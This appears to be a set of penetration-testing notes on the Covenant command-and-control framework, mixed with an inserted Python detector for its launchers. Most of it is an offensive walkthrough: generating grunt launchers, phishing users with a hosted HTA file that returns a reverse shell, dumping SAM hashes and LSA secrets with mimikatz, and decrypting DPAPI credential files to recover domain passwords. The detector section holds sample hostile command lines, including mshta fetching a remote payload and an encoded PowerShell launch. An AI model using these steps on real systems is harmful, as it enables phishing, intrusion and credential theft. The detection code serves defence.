Covenant
Installation
Install Dotnet
Install and launch Covenant
Navigate to https://127.0.0.1:7443, set up your user and you should be good to go.
Start a listener
Create a Launcher to get a shell
Once the PowerShell code is run on the target you should see that a grunt has popped.
Launcher types
Binary: generates a custom binary to launch a grunt; does not rely on a system binary.
Shellcode: converts the binary to shellcode using donut.
PowerShell: generates PowerShell code to launch a grunt using powershell.exe.
MSBuild: generates an MSBuild XML file to launch a grunt using msbuild.exe.
InstallUtil: generates an InstallUtil XML file to launch a grunt using installutil.exe.
Mshta: generates an HTA file to launch a grunt using mshta.exe.
Regsvr32: generates an SCT file to launch a grunt using regsvr32.exe.
Wmic: generates an XSL file to launch a grunt using wmic.exe.
Cscript: generates a JScript file to launch a grunt using cscript.exe.
Wscript: generates a JScript file to launch a grunt using wscript.exe.
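From the defender's side, the launcher list above is also a watchlist: every type except Binary starts a grunt through a stock Windows binary fed a remote URL, a payload file of a known type, or an encoded PowerShell command. The following Python is an added example (not part of these notes or of the Covenant project) that flags process-creation events matching those traits; the event shape (image path, command line) and the sample events are constructed.

```python
import re
from dataclasses import dataclass
from typing import Optional

# System binaries that the Covenant launcher types above use to start a grunt.
LAUNCHER_BINARIES = {
    "powershell.exe": "PowerShell", "msbuild.exe": "MSBuild",
    "installutil.exe": "InstallUtil", "mshta.exe": "Mshta",
    "regsvr32.exe": "Regsvr32", "wmic.exe": "Wmic",
    "cscript.exe": "Cscript", "wscript.exe": "Wscript",
}
# Payload file types the launcher list says these binaries are fed.
PAYLOAD_FILE = re.compile(r"\.(hta|sct|xsl|js|xml)\b", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# The PowerShell launcher is an encoded command: a long base64 argument.
ENCODED_PS = re.compile(r"-(encodedcommand|enc)\s+[A-Za-z0-9+/=]{40,}", re.IGNORECASE)

@dataclass
class Alert:
    launcher: str      # launcher type from the list above
    reason: str        # why the event was flagged
    command_line: str

def analyse_event(image: str, command_line: str) -> Optional[Alert]:
    """Return an Alert when a process-creation event looks like a launcher."""
    exe = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    launcher = LAUNCHER_BINARIES.get(exe)
    if launcher is None:
        return None  # not one of the binaries the launchers rely on
    if REMOTE_URL.search(command_line):
        return Alert(launcher, "remote URL on command line", command_line)
    m = PAYLOAD_FILE.search(command_line)
    if m:
        return Alert(launcher, f"{m.group(0).lower()} payload file passed to LOLBin", command_line)
    if launcher == "PowerShell" and ENCODED_PS.search(command_line):
        return Alert(launcher, "encoded PowerShell command", command_line)
    return None  # ordinary use of the binary (e.g. an admin script)

def scan(events):
    return [a for a in (analyse_event(i, c) for i, c in events) if a]

# Constructed sample events (image, command line); not real telemetry.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\mshta.exe", "mshta.exe http://IP-OF-ATTACK-MACHINE/name-of-your-script.hta"),
    (r"C:\Windows\System32\cscript.exe", r"cscript.exe C:\Users\Public\launcher.js"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"powershell.exe -File C:\scripts\backup.ps1"),
    (r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\Users\Public\launcher.hta"),
]
```

scan(SAMPLE_EVENTS) returns three alerts (Mshta, Cscript, PowerShell) and leaves the .ps1 and notepad events alone. Hits are triage leads rather than verdicts: cscript running an administrator's own .js file matches the same rule.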
Local Enumeration
Suppose we have a grunt (a shell on the target) and want to enumerate the target.
Click on the grunt > Interact
Use Seatbelt
Seatbelt -group=all
We will get useful info: local users, DNS info (such as the email domain), interesting files, etc.
Use the cmd
GetDomainUser
to enumerate domain users.
Use the cmd
GetNetLoggedOnUser
to get a list of logged-on users.
Use the cmd
GetNetLocalGroup
to get a list of local groups, etc.
HTA Email Phishing
Create an HTA file on your attacking machine:
Create an HTTP listener in Covenant
Listener > create
The table in Listeners should look like this:
Name: HTTP Listener
ListenerType: HTTP
Status: Active
StartTime: 3/7/2022 8:28:13 PM
ConnectAddresses: IP-OF-ATTACK-MACHINE
ConnectPort: 80
Go to Launchers > Powershell
Fill in the info; be careful that the kill date is in the future (not in the past).
Click on generate
Copy the encoded launcher and put it in the script above in place of
<powershell command here>
Save the script
Go back to Listeners and click on the listener that was just set up.
Go to Hosted Files, in Path enter
/name-of-your-script.hta
Click on Browse and select your script
And click on create
If we go to
http://localhost/name-of-your-script.hta
we should be able to download it
We can now send an email with a link to our reverse shell
http://IP-OF-ATTACK-MACHINE/name-of-your-script.hta
When the user clicks the link and runs the script we will get our reverse shell.
If we go to Covenant again and check in Grunt we should have a new one
If you are not able to execute commands (they stay Uninitialized), try either of these:
Verify the kill date of the launcher
the UI may not allow changing the date. This can be fixed by deleting the
/opt/Covenant/Covenant/data/covenant.db
file and restarting the service. You will lose all data and need to create a new user to log in with.
Dump hashes with mimikatz
In a high-integrity grunt:
We can use this to see if any plaintext info might come out
Mimikatz token::elevate lsadump::secrets
Will dump the SAM file (where password hashes are stored in Windows):
Mimikatz token::elevate lsadump::sam
Covenant will save the Credentials in the Data section as well.
Cracking Credential Vault with mimikatz
We need a medium-integrity grunt.
mimikatz vault::cred
will show all services with persisted passwords.
ls C:\users\user\appdata\local\microsoft\credentials
will list the password files; the smallest of the files is generally the one we need. We then go to the Task tab in our grunt, select Mimikatz from the list and type this task:
"dpapi::cred /in:C:\users\user\appdata\local\microsoft\credentials\FILE-PREVIOUSLY-CHOSEN"
From the output of the task we need to keep aside the value of the guidMasterKey
ls C:\users\user\appdata\roaming\microsoft\protect
This should list a directory with an SID value at the end. If you do an ls on this directory it should list the same path with the guidMasterKey value we previously found. We need to copy the full path, then go to Task again and, using Mimikatz, type
"dpapi::masterkey /in:C:\users\user\appdata\roaming\microsoft\protect\sid\guidMasterKey /rpc"
This way we will get, at the end of the output, the key for the domain controller, which should look like this:
key : 60f202bff3c6e2eaedfc4c28ac1adbdd102ec7dba401157f6f8c2056205507ed4e6d93120ebe48959751c0f2c939e515382d7ffec7bd2b129c8eb89466b31f0f
We need to keep this key aside
We go back to Task and type "dpapi::cred /in:C:\users\user\appdata\local\microsoft\credentials\sid /masterkey:" (with the key we kept aside after /masterkey:).
This should dump the domain password, you should see it at the end of the output:
Common issues with Covenant
Issue - The dashboard is acting weird and not allowing the creation of listeners, payloads, etc.
Solution - Delete /opt/Covenant/Covenant/data/Covenant.db and restart Covenant.
Issue - I can get a Grunt to connect back to Covenant, but when attempting to run commands it just sits on uninitialized and doesn't execute.
Solution - This is likely an issue with the Grunt kill date. It's your responsibility to pay attention to the kill date in the launcher generator to ensure it is a date and time in the future. In rare circumstances the UI may not allow changing the date. This can be fixed by deleting the
/opt/Covenant/Covenant/data/Covenant.db
file and restarting the service. Note you will lose all data and need to create a new user to log in with. This is a known issue with Covenant.